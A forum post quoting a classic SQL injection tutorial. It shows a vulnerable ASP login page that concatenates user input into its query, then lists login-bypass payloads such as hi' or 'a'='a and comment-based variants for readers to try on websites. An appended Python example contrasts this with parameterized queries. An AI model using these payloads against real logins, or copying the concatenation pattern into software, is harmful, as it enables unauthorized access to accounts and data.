SQL Injection [Part I]
[QUOTE="yms, post: 2997357, member: 4237"]
Part I – Using HTTP port 80 (or better would be malformed URLs)
----------------------------------------------------------------

This part will be useful not only to the hackers but also to the web designers. A common mistake made by web designers can reveal the databases of the server to the hacker. Let's look at it. The whole game is of query strings, so it is assumed that the reader has some knowledge about queries and ASP. And one more thing: this hack is done using only the browser, so you don't even require any other tools except IE or Netscape.

Normally, in order to make a login page, the web designer will write the following code.

login.htm

<html>
<body>
<form method="post" action="logincheck.asp">
<input type="text" name="login_name">
<input type="text" name="pass">
<input type="submit" value="sign in">
</form>
</body>
</html>

logincheck.asp

<%@ language="vbscript" %>
<%
' Read the submitted form fields
dim conn,rs,log,pwd
log=Request.form("login_name")
pwd=Request.form("pass")

' Open the Access database
set conn = Server.CreateObject("ADODB.Connection")
conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"
conn.Open
set rs = Server.CreateObject("ADODB.Recordset")
' The user input is concatenated directly into the SQL text (the mistake discussed below)
rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn
If rs.EOF Then
 response.write("Login failed")
else
 response.write("Login successful")
End if
%>

Looking at the above code, at first sight it seems OK. A user will type his login name and password in the login.htm page and click the submit button. The values of the text boxes will be passed to the logincheck.asp page, where they will be checked using the query string. If it doesn't get an entry satisfying the query and reaches end of file, a message of login failed will be displayed. Everything seems to be OK. But wait a minute. Think again. Is everything really OK?!! What about the query?!! Is it OK? Well, if you have made a page like this then a hacker can easily log in successfully without knowing the password. How? Let's look at the query again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "

Now if a user types his login name as "r0ot-hAcK" and password as "h4x3r" then these values will pass to the asp page with the post method and then the above query will become

"Select * from table1 where login=' r0ot-hAcK ' and password=' h4x3r ' "

That's fine. There will be an entry r0ot-hAcK and h4x3r in the login and password fields in the database, so we will receive a message as login successful. Now what if I type the login name as "r0ot-hAcK" and the password as

hi' or 'a'='a

in the password text box? The query will become as follows:

"Select * from table1 where login=' r0ot-hAcK ' and password=' hi' or 'a'='a ' "

And submit and bingo!!!!! I will get the message as Login successful!! Did you see the smartness of the hacker, which was due to the carelessness of the web designer?!!

The query is satisfied because the query has changed: the password needs to be 'hi' or 'a' needs to be equal to 'a'. Clearly the password is not 'hi', but at the same time 'a'='a'. So the condition is satisfied. And a hacker is in with login "r0ot-hAcK"!! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here, -- will make the rest of the query string a comment, so the other conditions will not be checked. Similarly you can provide

r0ot-hAcK ' --
r0ot-hAcK " --

or other such possibilities in the login name textbox, and anything as the password, which might let you in. Because in the query string only the login name is checked as "r0ot-hAcK" and the rest is ignored due to --. Well, if you are lucky enough you get such a website where the web designer has made the above mistake, and then you will be able to log in as any user!!!

Part II will be coming soon... :D KIT
[/QUOTE]
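An added example, not part of the original post: the post's query built once by concatenation and once with bound parameters, run against an in-memory SQLite table instead of the post's Jet/ASP setup. The sample row, the `it's` input and the function names are assumptions made for the demonstration.

```python
import sqlite3

def make_db():
    # In-memory stand-in for the post's table1; the single row is constructed.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table1 (login TEXT, password TEXT)")
    conn.execute("INSERT INTO table1 VALUES ('r0ot-hAcK', 'h4x3r')")
    return conn

def login_concat(conn, log, pwd):
    # Same concatenation as logincheck.asp: input becomes part of the SQL text.
    sql = ("Select * from table1 where login='" + log +
           "' and password='" + pwd + "' ")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        # A stray quote in the input leaves the statement unparsable.
        return "sql error"

def login_param(conn, log, pwd):
    # Placeholders keep the statement fixed; input is bound as data only.
    sql = "SELECT 1 FROM table1 WHERE login = ? AND password = ?"
    return conn.execute(sql, (log, pwd)).fetchone() is not None

# Constructed inputs; the third password is the one quoted in the post.
CASES = [
    ("r0ot-hAcK", "h4x3r"),
    ("r0ot-hAcK", "wrong"),
    ("r0ot-hAcK", "hi' or 'a'='a"),
    ("r0ot-hAcK", "it's"),
]

def compare():
    # Returns (password, concatenated result, parameterized result) per case.
    conn = make_db()
    return [(pwd, login_concat(conn, log, pwd), login_param(conn, log, pwd))
            for log, pwd in CASES]

if __name__ == "__main__":
    for pwd, concat, param in compare():
        print(f"{pwd!r:20} concatenated={concat!s:10} parameterized={param}")
```

In classic ASP the same binding is done with an ADODB.Command object and its Parameters collection rather than a concatenated string passed to rs.open.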